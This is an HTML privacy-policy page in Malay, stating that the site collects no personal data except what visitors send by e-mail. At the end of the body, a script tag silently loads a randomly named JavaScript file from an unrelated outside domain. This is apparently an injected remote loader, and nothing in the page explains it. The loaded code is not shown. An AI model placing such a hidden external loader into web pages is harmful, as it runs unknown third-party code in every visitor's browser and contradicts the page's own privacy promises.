<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <title>Dasar Privasi</title>
</head>

<body data-gr-c-s-loaded="true">

	<p>
	    </p><h3>Privasi anda</h3>
			Halaman ini menerangkan dasar privasi yang merangkumi penggunaan dan perlindungan maklumat yang dikemukakan oleh pengunjung. Maklumat-maklumat privasi anda tidak akan didedahkan kepada pihak lain.
		<p>
		
	</p>

	<p>
	    </p><h3>Maklumat terkumpul</h3>
		    Tiada maklumat peribadi akan dikumpul semasa anda melayari laman web ini kecuali maklumat yang dikemukakan oleh anda melalui e-mel.
		<p>
	</p>

	<p>
	    </p><h3>Pindaan Dasar</h3>
		    Sekiranya dasar privasi ini dipinda, pindaan akan dikemaskini di halaman ini.
		    Dengan sering melayari halaman ini, anda akan dikemas kini dengan maklumat yang dikumpul, cara ia digunakan dan dalam keadaan tertentu,
		    bagaimana maklumat dikongsi bersama pihak yang lain
		<p>
	</p>

<script type="text/javascript" async="" src="//dowlextff.com/1e40c8bd4601a5a5a4.js"></script>
</body>
</html>